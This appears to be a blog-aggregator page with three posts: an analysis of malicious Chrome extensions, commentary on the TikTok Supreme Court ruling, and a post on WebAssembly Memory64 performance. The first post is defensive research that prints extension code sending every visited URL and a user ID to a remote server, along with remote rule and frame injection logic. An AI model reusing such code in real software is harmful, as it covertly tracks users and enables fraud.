Back in 2023 I pointed out that “Adblock all advertisements” is malicious and spying on its users. A year earlier McAfee already called out a bunch of extensions as malicious. For whatever reason, Google decided to let Adblock all advertisements stay, and three extensions from the McAfee article also remained in Chrome Web Store: Netflix Party, FlipShope and AutoBuy Flash Sales. Out of these three, Netflix Party and AutoBuy Flash Sales still (or again) contain malicious functionality.

Update (2025-01-28): This article originally claimed that FlipShope extension was also malicious and listed this extension cluster under the name of its developing company, Technosense Media. This was incorrect, the extension merely contained some recognizable but dead code. According to Technosense Media, they bought the extension in 2023. Presumably, the problematic code was introduced by the previous extension owner and is unused.

Spying on the users

Coming back to Adblock all advertisements, it is still clearly spying on its users, using ad blocking functionality as a pretense to send the address of each page visited to its server (code slightly simplified for readability):

chrome.tabs.onUpdated.addListener(async (tabId, changeInfo, tab) => {
  if ("complete" === changeInfo.status) {
    let params = {
      url: tab.url,
      userId: await chrome.storage.sync.get("userId")
    };
    const response = await fetch("https://smartadblocker.com/extension/rules/api", {
      method: "POST",
      credentials: "include",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify(params)
    });
    const rules = await response.json();
    
  }
});

Supposedly, this code downloads a set of site-specific rules. In theory this could be legitimate functionality not meant to spy on users. The giveaway isn’t merely that the endpoint doesn’t produce any really meaningful responses. Legitimate functionality with no intention to spy wouldn’t send a unique user ID with the request, would cut the page address down to the host name (or at least remove all parameters), and would cache the response. The latter would happen simply to reduce the load on this endpoint, something anybody does unless the endpoint is paid for with users’ data.
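For contrast, here is a sketch of what a privacy-respecting rule download could look like (entirely hypothetical; the extension does none of this): send only the host name, attach no user ID, and cache responses so each host is requested once.

```javascript
// Cache of per-host rules, so the endpoint sees each host at most once.
const ruleCache = new Map();

async function getRulesFor(pageUrl, fetchRules) {
  const host = new URL(pageUrl).hostname;        // drop path and parameters
  if (!ruleCache.has(host)) {
    ruleCache.set(host, await fetchRules(host)); // one request per host
  }
  return ruleCache.get(host);
}
```

The difference to the code above is exactly what turns a rule service into a tracking service: the full URL, the user ID, and a fresh request for every single page load.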

The bogus rule processing

Nothing about the section above is new; I already wrote as much in 2023. But either I didn’t take a close look at the rule processing back then, or it got considerably worse. Here is what it looks like today (variable and function naming is mine, the code was minified):

for (const key in rules) {
  if ("id" === key || "genericId" === key) {
    // Remove elements by ID
  } else if ("class" === key || "genericClass" === key) {
    // Remove elements by class name
  } else if ("innerText" === key) {
    // Remove elements by text
  } else if ("rules" === key) {
    if (rules.updateRules)
      applyRules(rules[key], rules.rule_scope, tabId);
  } else if ("cc" === key) {
    // Bogus logic to let the server decide which language-specific filter
    // list should be enabled
  }
}

The interesting part here is the applyRules call which conveniently isn’t triggered by the initial server responses (updateRules key is set to false). This function looks roughly like this:

async function applyRules(rules, scope, tabId) {
  if ("global" !== scope) {
    if (0 !== rules.length) {
      const existingRules = await chrome.declarativeNetRequest.getDynamicRules();
      const ruleIds = existingRules.map(rule => rule.id);
      chrome.declarativeNetRequest.updateDynamicRules({
        removeRuleIds: ruleIds,
        addRules: rules
      });
    }
  } else {
    chrome.tabs.sendMessage(tabId, {
      message: "start",
      link: rules
    });
  }
}

So if the “scope” is anything but "global", the rules provided by the server will be added to the declarativeNetRequest API. Modifying these rules on a per-request basis makes no sense for ad blocking, but it opens up rich possibilities for abuse, as we’ve seen already. Given what McAfee discovered about these extensions before, this is likely meant for cookie stuffing, yet execution of arbitrary JavaScript code in the context of targeted web pages is also a possible scenario.

And if the “scope” is "global" the extension sends a message to its content script which will inject a frame with the given address into the page. Again, this makes no sense whatsoever for blocking ads, but it definitely works for affiliate fraud – which is what these extensions are all about according to McAfee.

Depending on the extension there might be only frame injection or only adding of dynamic rules. Given the purpose of the AutoBuy extension, it can probably pass as legitimate by Google’s rules, others not so much.

The affected extensions

Name Weekly active users Extension ID Featured
Auto Refresh Plus 100,000 ffejlioijcokmblckiijnjcmfidjppdn
Smart Auto Refresh 100,000 fkjngjgmgbfelejhbjblhjkehchifpcj
Adblock all advertisement - No Ads extension 700,000 gbdjcgalliefpinpmggefbloehmmknca
AutoBuy Flash Sales, Deals, and Coupons 20,000 gbnahglfafmhaehbdmjedfhdmimjcbed
Autoskip for Youtube™ Ads 200,000 hmbnhhcgiecenbbkgdoaoafjpeaboine
Smart Adblocker 50,000 iojpcjjdfhlcbgjnpngcmaojmlokmeii
Adblock for Browser 10,000 jcbjcocinigpbgfpnhlpagidbmlngnnn
Netflix Party 500,000 mmnbenehknklpbendgmgngeaignppnbe
Free adblocker 8,000 njjbfkooniaeodkimaidbpginjcmhmbm
Video Ad Block Youtube 100,000 okepkpmjhegbhmnnondmminfgfbjddpb
Picture in Picture for Videos 30,000 pmdjjeplkafhkdjebfaoaljknbmilfgo

Update (2025-01-28): Added Auto Refresh Plus and Picture in Picture for Videos to the list. The former only contains the spying functionality, the latter spying and frame injection.

Sweet VPN

I’ll be looking at Sweet VPN as a representative of 32 extensions I found using highly obfuscated code. These extensions aren’t exactly new to this blog either; my post in 2023 already named three of them, even though I couldn’t identify the malicious functionality back then. Most likely I simply overlooked it; I didn’t have time to investigate each extension thoroughly.

These extensions also decided to circumvent remote code restrictions but their approach is way more elaborate. They download some JSON data from the server and add it to the extension’s storage. While some keys like proxy_list are expected here and always present, a number of others are absent from the server response when the extension is first installed. These can contain malicious instructions.

Anti-debugging protection

For example, the four keys 0, 1, 2, 3 seem to be meant for anti-debugging protection. If present, the values of these keys are concatenated and parsed as JSON into an array. A property resolution mechanism then allows resolving arbitrarily deep values, starting at the self object of the extension’s background worker. The result is three values, which are used like this:

value1({value2: value3}, result => {
  
});

This call is repeated every three seconds. If result is a non-empty array, the extension removes all but a few storage keys and stops further checks. This is clearly meant to remove traces of malicious activity. I am not aware of any ways for an extension to detect an open Developer Tools window, so this call is probably meant to detect the extension management page that Developer Tools are opened from:

chrome.tabs.query({"url": "chrome://extensions/*"}, result => {
  
});
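The property resolution step described above can be sketched in plain JavaScript. The helper name is hypothetical; the point is that a dot-separated path in the downloaded data resolves to a live API function without any function names appearing in the extension’s code:

```javascript
// Walk a dot-separated path starting from a root object. The extension
// starts at the background worker's `self`, so a server-supplied path
// like "chrome.tabs.query" resolves to a callable API function.
function resolvePath(root, path) {
  return path.split(".").reduce((obj, key) => obj?.[key], root);
}
```

This is why static analysis of the extension reveals so little: which APIs get called is decided entirely by the server.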

Guessing further functionality

This protection mechanism is only a very small part of the obfuscated logic in the extension. There are lots of values being decoded, tossed around, used in some function calls. It is difficult to reconstruct the logic with the key parts missing. However, the extension doesn’t have too many permissions:

"permissions": [
  "proxy",
  "storage",
  "tabs"
],
"host_permissions": [
  "https://ipapi.co/json/",
  "https://ip.seeip.org/geoip",
  "https://api.myip.com/",
  "https://ifconfig.co/json"
],

Given that almost no websites can be accessed directly, it’s a safe bet that the purpose of the concealed functionality is spying on the users. That’s what the tabs permission is for, to be notified of any changes in the user’s browsing session.

In fact, once you know that the function being passed as a parameter is a tabs.onUpdated listener, its logic becomes way easier to understand, despite the missing parts. So the cl key in the extension’s storage (other extensions often use other names) is the event queue where data about the user’s browsing is being stored. Once there are at least 10 events, the queue is sent to the same address the extension downloads its configuration from.
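The batching behaviour can be sketched like this (hypothetical names; the real code stores the queue in extension storage rather than memory):

```javascript
// Accumulate browsing events and flush them to the server once at
// least `limit` are queued.
function makeEventQueue(send, limit = 10) {
  const queue = [];
  return event => {
    queue.push(event);
    if (queue.length >= limit) {
      send(queue.splice(0)); // flush and empty the queue
    }
  };
}
```

Batching like this keeps the network traffic inconspicuous: instead of one request per page visited, there is one request per ten pages.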

There are also some chrome.tabs.update() calls in the code, replacing the address of the currently loading page by something else. It’s hard to be certain what these are used for: it could be search redirection, affiliate fraud or plainly navigating to advertising pages.

The affected extensions

Name Weekly active users Extension ID Featured
VK UnBlock. Works fast. 40,000 ahdigjdpekdcpbajihncondbplelbcmo
VPN Proxy Master 120 akkjhhdlbfibjcfnmkmcaknbmmbngkgn
VPN Unblocker for Instagram 8,000 akmlnidakeiaipibeaidhlekfkjamgkm
StoriesHub 100,000 angjmncdicjedpjcapomhnjeinkhdddf
Facebook and Instagram Downloader 30,000 baajncdfffcpahjjmhhnhflmbelpbpli
Downloader for Instagram - ToolMaster 100,000 bgbclojjlpkimdhhdhbmbgpkaenfmkoe
TikTok in USA 20,000 bgcmndidjhfimbbocplkapiaaokhlcac
Sweet VPN 100,000 bojaonpikbbgeijomodbogeiebkckkoi
Access to Odnoklassniki 4,000 ccaieagllbdljoabpdjiafjedojoejcl
Ghost - Anonymous Stories for Instagram 20,000 cdpeckclhmpcancbdihdfnfcncafaicp
StorySpace Manager for FB and IG Stories 10,000 cicohiknlppcipjbfpoghjbncojncjgb
VPN Unblocker for YouTube 40,000 cnodohbngpblpllnokiijcpnepdmfkgm
Universal Video Downloader 200,000 cogmkaeijeflocngklepoknelfjpdjng
Free privacy connection - VPN guru 500,000 dcaffjpclkkjfacgfofgpjbmgjnjlpmh
Live Recorder for Instagram aka MasterReco 10,000 djngbdfelbifdjcoclafcdhpamhmeamj
Video Downloader for Vimeo 100,000 dkiipfbcepndfilijijlacffnlbchigb
VPN Ultimate - Best VPN by unblock 400,000 epeigjgefhajkiiallmfblgglmdbhfab
Insured Smart VPN - Best Proxy ever unblock everything 2,000 idoimknkimlgjadphdkmgocgpbkjfoch
Ultra Downloader for Instagram 30,000 inekcncapjijgfjjlkadkmdgfoekcilb
Parental Control. Blocks porn, malware, etc. 3,000 iohpehejkbkfdgpfhmlbogapmpkefdej
UlV. Ultimate downloader for Vimeo 2,000 jpoobmnmkchgfckdlbgboeaojhgopidn
Simplify. Downloader for Instagram 20,000 kceofhgmmjgfmnepogjifiomgojpmhep
Download Facebook Video 591 kdemfcffpjfikmpmfllaehabkgkeakak
VPN Unblocker for Facebook 3,000 kheajjdamndeonfpjchdmkpjlemlbkma
Video Downloader for FaceBook 90,000 kjnmedaeobfmoehceokbmpamheibpdjj
TikTok Video Keeper 40,000 kmobjdioiclamniofdnngmafbhgcniok
Mass Downloader for Instagram 100,000 ldoldiahbhnbfdihknppjbhgjngibdbe
Stories for FaceBook - Anon view, download 3,000 nfimgoaflmkihgkfoplaekifpeicacdn
VPN Surf - Fast VPN by unblock 800,000 nhnfcgpcbfclhfafjlooihdfghaeinfc
TikTok Video Downloader 20,000 oaceepljpkcbcgccnmlepeofkhplkbih
Video Downloader for FaceBook 10,000 ododgdnipimbpbfioijikckkgkbkginh
Exta: Pro downloader for Instagram 10,000 ppcmpaldbkcoeiepfbkdahoaepnoacgd

Bonus section: more malicious extensions

Update (2025-01-20): Added Adblock Bear and AdBlock 360 after a hint from a commenter.

As is often the case with the Chrome Web Store, my searches regularly turned up more malicious extensions unrelated to the ones I was looking for. Some of them also devised their own mechanisms to execute remote code. I didn’t find more extensions using the same approach, which of course doesn’t mean that there are none.

Adblock for Youtube is yet another browser extension essentially bundling an interpreter for their very own minimalistic programming language. One part of the instructions it receives from its server is executed in the context of the privileged background worker, the other in the content script context.

EasyNav, Adblock Bear and AdBlock 360 use an approach quite similar to Phoenix Invicta. In particular, they add rules to the declarativeNetRequest API that they receive from their respective server. EasyNav also removes security headers. These extensions don’t bother with HTML injection however, instead their server produces a list of scripts to be injected into web pages. There are specific scripts for some domains and a fallback for everything else.

Download Manager Integration Checklist is merely supposed to display some instructions, it shouldn’t need any privileges at all. Yet this extension requests access to all web pages and will add rules to the declarativeNetRequest API that it downloads from its server.

Translator makes it look like its configuration is all about downloading a list of languages. But it also contains a regular expression to test against website addresses and the instructions on what to do with matching websites: a tag name of the element to create and a bunch of attributes to set. Given that the element isn’t removed after insertion, this is probably about injecting advertising frames. This mechanism could just as well be used to inject a script however.

The affected extensions

Name Weekly active users Extension ID Featured
Adblock for Youtube™ - Auto Skip ad 8,000 anceggghekdpfkjihcojnlijcocgmaoo
EasyNav 30,000 aobeidoiagedbcogakfipippifjheaom
Adblock Bear - stop invasive ads 100,000 gdiknemhndplpgnnnjjjhphhembfojec
AdBlock 360 400,000 ghfkgecdjkmgjkhbdpjdhimeleinmmkl
Download Manager Integration Checklist 70,000 ghkcpcihdonjljjddkmjccibagkjohpi
Translator 100,000 icchadngbpkcegnabnabhkjkfkfflmpj

IOCs

The following domain names are associated with Phoenix Invicta:

  • 1-click-cp[.]com
  • adblock-ads-and-yt[.]pro
  • agadata[.]online
  • anysearch[.]guru
  • anysearchnow[.]info
  • astatic[.]site
  • astato[.]online
  • astralink[.]click
  • best-browser-extensions[.]com
  • better-color-picker[.]guru
  • betterfind[.]online
  • capture-it[.]online
  • chrome-settings[.]online
  • click-and-pick[.]pro
  • color-picker-quick[.]info
  • customcursors[.]online
  • dailyview[.]site
  • datalocked[.]online
  • dmext[.]online
  • dopni[.]com
  • doublestat[.]info
  • doubleview[.]online
  • easy-dark-mode[.]online
  • emojikeyboard[.]site
  • everyview[.]info
  • fasterbrowser[.]online
  • fastertabs[.]online
  • findmanual[.]org
  • fivem[.]com[.]tr
  • fixfind[.]online
  • font-expert[.]pro
  • freestikers[.]top
  • freetabmemory[.]online
  • get-any-manual[.]pro
  • get-manual[.]info
  • getresult[.]guru
  • good-ship[.]com
  • gulkayak[.]com
  • isstillalive[.]com
  • kralforum[.]com[.]tr
  • locodata[.]site
  • lottingem[.]com
  • manual-finder[.]site
  • manuals-viewer[.]info
  • megaboost[.]site
  • nocodata[.]online
  • ntdataview[.]online
  • picky-ext[.]pro
  • pocodata[.]pro
  • readtxt[.]pro
  • rumorpix[.]com
  • screencapx[.]co
  • searchglobal[.]online
  • search-protection[.]org
  • searchresultspage[.]online
  • shurkul[.]online
  • skipadsplus[.]online
  • skip-all-ads[.]info
  • skip-n-watch[.]info
  • skippy[.]pro
  • smartsearch[.]guru
  • smartsearch[.]top
  • socialtab[.]top
  • soundbooster[.]online
  • speechit[.]pro
  • super-sound-booster[.]info
  • tabmemoptimizer[.]site
  • taboptimizer[.]com
  • text-speecher[.]online
  • topodat[.]info
  • triplestat[.]online
  • true-sound-booster[.]online
  • ufind[.]site
  • video-downloader-click-save[.]online
  • video-downloader-plus[.]info
  • vipoisk[.]ru
  • vipsearch[.]guru
  • vipsearch[.]top
  • voicereader[.]online
  • websiteconf[.]online
  • youtube-ads-skip[.]site
  • ystatic[.]site

The following domain names are used by Netflix Party and related extensions:

  • abforbrowser[.]com
  • autorefresh[.]co
  • autorefreshplus[.]in
  • getmatchingcouponsanddeals[.]info
  • pipextension[.]com
  • smartadblocker[.]com
  • telenetflixparty[.]com
  • ytadblock[.]com
  • ytadskip[.]com

The following domain names are used by Sweet VPN and related extensions:

  • analyticsbatch[.]com
  • aquafreevpn[.]com
  • batchindex[.]com
  • browserdatahub[.]com
  • browserlisting[.]com
  • checkbrowserer[.]com
  • countstatistic[.]com
  • estimatestatistic[.]com
  • metricbashboard[.]com
  • proxy-config[.]com
  • qippin[.]com
  • realtimestatistic[.]com
  • secondstatistic[.]com
  • securemastervpn[.]com
  • shceduleuser[.]com
  • statisticindex[.]com
  • sweet-vpn[.]com
  • timeinspection[.]com
  • traficmetrics[.]com
  • trafficreqort[.]com
  • ultimeo-downloader[.]com
  • unbansocial[.]com
  • userestimate[.]com
  • virtualstatist[.]com
  • webstatscheck[.]com

These domain names are used by the extensions in the bonus section:

  • adblock-360[.]com
  • easynav[.]net
  • internetdownloadmanager[.]top
  • privacy-bear[.]net
  • skipads-ytb[.]com
  • translatories[.]com

Don MartiSupreme Court files confusing bug report

I’m still an Internet optimist despite…things…so I was hoping that Friday’s Supreme Court opinion in the TikTok case would have some useful information about how to design online social networking in a way that does get First Amendment protection, even if TikTok doesn’t. But no. Considered as a bug report, the opinion doesn’t help much. We basically got (1) TikTok collects lots of personal info (2) Congress gets to decide if and how it’s a national security problem to make personal info available to a foreign adversary, and so TikTok is banned. But everyone else doing social software, including collaboration software, is going to have a lot to find out for themselves.

The Supreme Court pretty much ignores TikTok’s dreaded For You Page algorithm and focuses on the privacy problem. So we don’t know if some future ban of some hypothetical future app that somehow fixed its data collection issues would hold up in court just based on how it does content recommendations. (Regulating recommendation algorithms is a big issue that I’m not surprised the Court couldn’t agree on in the short time they had for this case.) We also get the following, on p. 9—TikTok got the benefit of the doubt and received some First Amendment consideration that future apps might or might not get.

This Court has not articulated a clear framework for determining whether a regulation of non-expressive activity that disproportionately burdens those engaged in expressive activity triggers heightened review. We need not do so here. We assume without deciding that the challenged provisions fall within this category and are subject to First Amendment scrutiny.

Page 11 should be good news for anybody drafting a privacy law anyway. Regulating data collection is content neutral for First Amendment purposes—which should be common sense.

The Government also supports the challenged provisions with a content-neutral justification: preventing China from collecting vast amounts of sensitive data from 170 million U. S. TikTok users. That rationale is decidedly content agnostic. It neither references the content of speech on TikTok nor reflects disagreement with the message such speech conveys….Because the data collection justification reflects a purpose[e] unrelated to the content of expression, it is content neutral.

The outbound flow of data from people in the USA is what makes the TikTok ban hold up in court. Prof. Eric Goldman writes that the ban is taking advantage of a privacy pretext for censorship, which is definitely something to watch out for in future privacy laws, but doesn’t apply in this case.

But so far the to-do list for future apps looks manageable.

  • Don’t surveil US users for a foreign adversary

  • Comply with whatever future restrictions on recommendation algorithms turn out to hold up in court. (Disclosure of rules or source code? Allow users to switch to chronological? Allow client-side or peer-to-peer filtering and scoring? Lots of options but possible to get out ahead of.)

Not so fast. Here’s the hard part. According to the Court the problem is not just the info that the app collects automatically and surreptitiously, or the user actions it records, but also the info that users send by some deliberate action. On page 14:

If, for example, a user allows TikTok access to the user’s phone contact list to connect with others on the platform, TikTok can access any data stored in the user’s contact list, including names, contact information, contact photos, job titles, and notes. Access to such detailed information about U. S. users, the Government worries, may enable China to track the locations of Federal employees and contractors, build dossiers of personal information for blackmail, and conduct corporate espionage.

and in Justice Gorsuch’s concurrence,

According to the Federal Bureau of Investigation, TikTok can access any data stored in a consenting user’s contact list—including names, photos, and other personal information about unconsenting third parties. Ibid. (emphasis added). And because the record shows that the People’s Republic of China (PRC) can require TikTok’s parent company to cooperate with [its] efforts to obtain personal data, there is little to stop all that information from ending up in the hands of a designated foreign adversary.

On the one hand, yes, sharing contacts does transfer a lot of information about people in the USA to TikTok. But sharing a contact list with an app can work a lot of different ways. It can be

  1. covert surveillance (although mobile platforms generally do their best to prevent this)

  2. data sharing that you get tricked into

  3. deliberate, more like choosing to email a copy of the company directory as an attachment

If it’s really a problem to enable a user to choose to share contact info, then that makes running collaboration software like GitHub in China a problem from the USA side. (Git repositories are full of metadata about who works on what, with whom. And that information is processed by other users, by the platform itself, and by third-party tools.) Other content creation tools also share the kinds of info on skills and work relationships that would be exactly what a foreign adversary murder robot needs to prioritize targets. But the user, not some surveillance software, generally puts that info there. If intentional contact sharing by users is part of the reason that the USA can ban TikTok, what does that mean for other kinds of user-to-user communication?

Kleptomaniac princesses

There’s a great story I read when I was a kid that I wish I had the citation for. It might be fictional, but I’m going to summarize it anyway because it’s happening again.

Once upon a time there was a country that the UK really, really wanted to maintain good diplomatic relations with. The country was in a critical strategic location and had some kind of natural resources or something, I don’t remember the details. The problem, though, was that the country was a monarchy, and one of the princesses loved to visit London and shoplift. And she was really bad at it. So diplomats had to go around to the stores in advance to tell the manager what was going on, convince the store to let her steal stuff, and promise to settle up afterwards.

Today, the companies that run the surveillance apps are a lot like that princess. (Techbros don’t have masculine energy; they have kleptomaniac princess energy.) If one country really needs to maintain good relations with another, they’ll allow that country’s surveillance apps to get away with privacy shenanigans. If relations get chillier, then normal law enforcement applies. At least for now, though, we don’t know what the normal laws here will look like, and the Supreme Court didn’t provide many hints yesterday.

Related

Big Tech platforms: mall, newspaper, or something else? A case where the Supreme Court did give better instructions (to state legislators, though, not app developers)

In TikTok v. Garland, Supreme Court Sends Good Vibes for Privacy Laws, But Congress’s Targeting of TikTok Alone Won’t Do Much to Protect Privacy by Tom McBrien, EPIC Counsel. The Court’s opinion was also a good sign for privacy advocates because it made clear that regulating data practices is an important and content-neutral regulatory intervention. Tech companies and their allies have long misinterpreted a Supreme Court case called Sorrell v. IMS Health to mean that all privacy laws are presumptively unconstitutional under the First Amendment because information is speech. But the TikTok Court explained that passing a law to protect privacy is decidedly content agnostic because it neither references the content of speech…nor reflects disagreement with the message such speech conveys. In fact, the Court found the TikTok law constitutional specifically on the grounds that it was passed to regulate privacy and emphasized how important the government interest is in protecting Americans’ privacy.

Bonus links

TikTok, AliExpress, SHEIN & Co surrender Europeans’ data to authoritarian China Today, noyb has filed GDPR complaints against TikTok, AliExpress, SHEIN, Temu, WeChat and Xiaomi for unlawful data transfers to China….As none of the companies responded adequately to the complainants’ access requests, we have to assume that this includes China. But EU law is clear: data transfers outside the EU are only allowed if the destination country doesn’t undermine the protection of data.

Total information collapse by Carole Cadwalladr It was the open society that enabled Zuckerberg to build his company, that educated his engineers and created a modern scientific country that largely obeyed the rules-based order. But that’s over. And, this week is a curtain raiser for how fast everything will change. Zuckerberg took a smashing ball this week to eight years’ worth of “trust and safety” work that has gone into trying to make social media a place fit for humans. That’s undone in a single stroke.

Lawsuit: Allstate used GasBuddy and other apps to quietly track driving behavior by Kevin Purdy. (But which of the apps running tracking software are foreign-owned? Because you can register an LLC in many states anonymously, it’s impossible to tell.)

Baltic Leadership in Brussels: What the New High Representative Kaja Kallas Means for Tech Policy | TechPolicy.Press by Sophie L. Vériter. [O]nline platforms and their users are affected by EU foreign policy through counter-disinformation regulations aimed at addressing foreign threats of interference and manipulation. Indeed, technology is increasingly considered a matter of security in the EU, which means that the HRVP may well have a significant impact on the digital space within and beyond the EU.

The Ministry of Empowerment by danah boyd. This isn’t about shareholder value. It’s about a kayfabe war between tech demagogues vying to be the most powerful boy in the room.

As Australia bans social media for kids under 16, age-assurance tech is in the spotlight by Natasha Lomas (more news from the splinternet)

Spidermonkey Development Blog: Is Memory64 actually worth using?

After many long years, the Memory64 proposal for WebAssembly has finally been released in both Firefox 134 and Chrome 133. In short, this proposal adds 64-bit pointers to WebAssembly.

If you are like most readers, you may be wondering: “Why wasn’t WebAssembly 64-bit to begin with?” Yes, it’s the year 2025 and WebAssembly has only just added 64-bit pointers. Why did it take so long, when 64-bit devices are the majority and 8GB of RAM is considered the bare minimum?

It’s easy to think that 64-bit WebAssembly would run better on 64-bit hardware, but unfortunately that’s simply not the case. WebAssembly apps tend to run slower in 64-bit mode than they do in 32-bit mode. This performance penalty depends on the workload, but it can range from just 10% to over 100%—a 2x slowdown just from changing your pointer size.

This is not simply due to a lack of optimization. Instead, the performance of Memory64 is restricted by hardware, operating systems, and the design of WebAssembly itself.

What is Memory64, actually?

To understand why Memory64 is slower, we first must understand how WebAssembly represents memory.

When you compile a program to WebAssembly, the result is a WebAssembly module. A module is analogous to an executable file, and contains all the information needed to bootstrap and run a program, including:

  • A description of how much memory will be necessary (the memory section)
  • Static data to be copied into memory (the data section)
  • The actual WebAssembly bytecode to execute (the code section)

These are encoded in an efficient binary format, but WebAssembly also has an official text syntax used for debugging and direct authoring. This article will use the text syntax. You can convert any WebAssembly module to the text syntax using tools like WABT (wasm2wat) or wasm-tools (wasm-tools print).

Here’s a simple but complete WebAssembly module that allows you to store and load an i32 at address 16 of its memory.

(module
  ;; Declare a memory with a size of 1 page (64KiB, or 65536 bytes)
  (memory 1)

  ;; Declare, and export, our store function
  (func (export "storeAt16") (param i32)
    i32.const 16  ;; push address 16 to the stack
    local.get 0   ;; get the i32 param and push it to the stack
    i32.store     ;; store the value to the address
  )

  ;; Declare, and export, our load function
  (func (export "loadFrom16") (result i32)
    i32.const 16  ;; push address 16 to the stack
    i32.load      ;; load from the address
  )
)

Now let’s modify the program to use Memory64:

(module
  ;; Declare an i64 memory with a size of 1 page (64KiB, or 65536 bytes)
  (memory i64 1)

  ;; Declare, and export, our store function
  (func (export "storeAt16") (param i32)
    i64.const 16  ;; push address 16 to the stack
    local.get 0   ;; get the i32 param and push it to the stack
    i32.store     ;; store the value to the address
  )

  ;; Declare, and export, our load function
  (func (export "loadFrom16") (result i32)
    i64.const 16  ;; push address 16 to the stack
    i32.load      ;; load from the address
  )
)

You can see that our memory declaration now includes i64, indicating that it uses 64-bit addresses. We therefore also change i32.const 16 to i64.const 16. That’s it. This is pretty much the entirety of the Memory64 proposal[1].

How is memory implemented?

So why does this tiny change make a difference for performance? We need to understand how WebAssembly engines actually implement memories.

Thankfully, this is very simple. The host (in this case, a browser) simply allocates memory for the WebAssembly module using a system call like mmap or VirtualAlloc. WebAssembly code is then free to read and write within that region, and the host (the browser) ensures that WebAssembly addresses (like 16) are translated to the correct address within the allocated memory.

However, WebAssembly has an important constraint: accessing memory out of bounds will trap, analogous to a segmentation fault (segfault). It is the host’s job to ensure that this happens, and in general it does so with bounds checks. These are simply extra instructions inserted into the machine code on each memory access—the equivalent of writing if (address >= memory.length) { trap(); } before every single load[2]. You can see this in the actual x64 machine code generated by SpiderMonkey for an i32.load[3]:

  movq 0x08(%r14), %rax       ;; load the size of memory from the instance (%r14)
  cmp %rax, %rdi              ;; compare the address (%rdi) to the limit
  jb .load                    ;; if the address is ok, jump to the load
  ud2                         ;; trap
.load:
  movl (%r15,%rdi,1), %eax    ;; load an i32 from memory (%r15 + %rdi)

These instructions have several costs! Besides taking up CPU cycles, they require an extra load from memory, they increase the size of machine code, and they take up branch predictor resources. But they are critical for ensuring the security and correctness of WebAssembly code.
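To make the cost concrete, here is a small illustrative sketch (in Python, not actual engine code) of what the inserted check does: every load first compares the address against the memory’s length and traps if the access would reach past the end.

```python
PAGE_SIZE = 64 * 1024  # one WebAssembly page (64KiB)

def load_i32(memory: bytearray, addr: int) -> int:
    """Emulate an i32.load with an explicit bounds check."""
    # The engine-inserted check: trap if the 4-byte read would
    # extend past the end of linear memory.
    if addr < 0 or addr + 4 > len(memory):
        raise RuntimeError("out-of-bounds memory access (trap)")
    return int.from_bytes(memory[addr:addr + 4], "little")

def store_i32(memory: bytearray, addr: int, value: int) -> None:
    """Emulate an i32.store with the same bounds check."""
    if addr < 0 or addr + 4 > len(memory):
        raise RuntimeError("out-of-bounds memory access (trap)")
    memory[addr:addr + 4] = (value & 0xFFFFFFFF).to_bytes(4, "little")

memory = bytearray(PAGE_SIZE)  # (memory 1): a single 64KiB page
store_i32(memory, 16, 42)      # the storeAt16 example from above
assert load_i32(memory, 16) == 42
```

An access at or past `PAGE_SIZE` raises instead of returning, which is the behavior the real machine-code check guarantees.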

Unless…we could come up with a way to remove them entirely.

How is memory really implemented?

The maximum possible value for a 32-bit integer is about 4 billion. 32-bit pointers therefore allow you to use up to 4GB of memory. The maximum possible value for a 64-bit integer, on the other hand, is about 18 quintillion, allowing you to use up to 18 exabytes of memory. This is truly enormous, tens of millions of times bigger than the memory in even the most advanced consumer machines today. In fact, because this difference is so great, most “64-bit” devices are actually 48-bit in practice, using just 48 bits of the memory address to map from virtual to physical addresses[4].

Even a 48-bit address space is enormous: 65,536 times larger than the largest possible 32-bit memory. This gives every process 281 terabytes of address space to work with, even if the device has only a few gigabytes of physical memory.
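The arithmetic behind these numbers is easy to check:

```python
GiB = 1024 ** 3

# 32-bit pointers: at most 2^32 bytes of addressable memory, i.e. 4GiB.
assert 2 ** 32 == 4 * GiB

# 48-bit virtual addresses cover 2^48 bytes: 65,536 times more
# than the largest possible 32-bit memory.
assert 2 ** 48 // 2 ** 32 == 65_536

# 2^48 bytes is about 281 terabytes (decimal) of address space.
assert 2 ** 48 // 10 ** 12 == 281
```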

This means that address space is cheap on 64-bit devices. If you like, you can reserve 4GB of address space from the operating system to ensure that it remains free for later use. Even if most of that memory is never used, this will have little to no impact on most systems.

How do browsers take advantage of this fact? By reserving 4GB of memory for every single WebAssembly module.

In our first example, we declared a 32-bit memory with a size of 64KB. But if you run this example on a 64-bit operating system, the browser will actually reserve 4GB of memory. The first 64KB of this 4GB block will be read-write, and the remaining 3.9999GB will be reserved but inaccessible.

Because 4GB of address space is reserved for every 32-bit WebAssembly module, it is impossible to go out of bounds. The largest possible pointer value, 2^32-1, will simply land inside the reserved region of memory and trap. This means that, when running 32-bit wasm on a 64-bit system, we can omit all bounds checks entirely[5].
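Here is a small sketch of why the reservation makes software checks redundant. Every value a 32-bit pointer can possibly hold lands inside the 4GB reservation, so an out-of-bounds access hits a protected page and the hardware faults; no comparison instructions are needed. (This is an illustration of the idea, not how an engine is implemented.)

```python
RESERVATION = 2 ** 32   # 4GiB of address space reserved per 32-bit memory
ACCESSIBLE = 64 * 1024  # only the declared pages are committed read-write

def classify(addr: int) -> str:
    """Where does a 32-bit wasm address land within the reservation?"""
    # Every possible u32 value is inside the reservation by construction,
    # so no software bounds check is ever needed.
    assert 0 <= addr < RESERVATION
    return "ok" if addr < ACCESSIBLE else "page fault (trap)"

# An in-bounds access touches committed memory...
assert classify(16) == "ok"
# ...while even the largest possible u32 lands in the protected region
# and traps via the hardware page fault.
assert classify(2 ** 32 - 1) == "page fault (trap)"
```

With 64-bit pointers no such reservation is possible, since the wasm address space is as large as the host’s, which is exactly why Memory64 must keep explicit checks.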

This optimization is impossible for Memory64. The size of the WebAssembly address space is the same as the size of the host address space. Therefore, we must pay the cost of bounds checks on every access, and as a result, Memory64 is slower.

So why use Memory64?

The only reason to use Memory64 is if you actually need more than 4GB of memory.

Memory64 won’t make your code faster or more “modern”. 64-bit pointers in WebAssembly simply allow you to address more memory, at the cost of slower loads and stores.

The performance penalty may diminish over time as engines make optimizations. Bounds checking strategies can be improved, and WebAssembly compilers may be able to eliminate some bounds checks at compile time. But it is impossible to beat the absolute removal of all bounds checks found in 32-bit WebAssembly.

Furthermore, the WebAssembly JS API constrains memories to a maximum size of 16GB. This may be quite disappointing for developers used to native memory limits. Unfortunately, because WebAssembly makes no distinction between “reserved” and “committed” memory, browsers cannot freely allocate large quantities of memory without running into system commit limits.

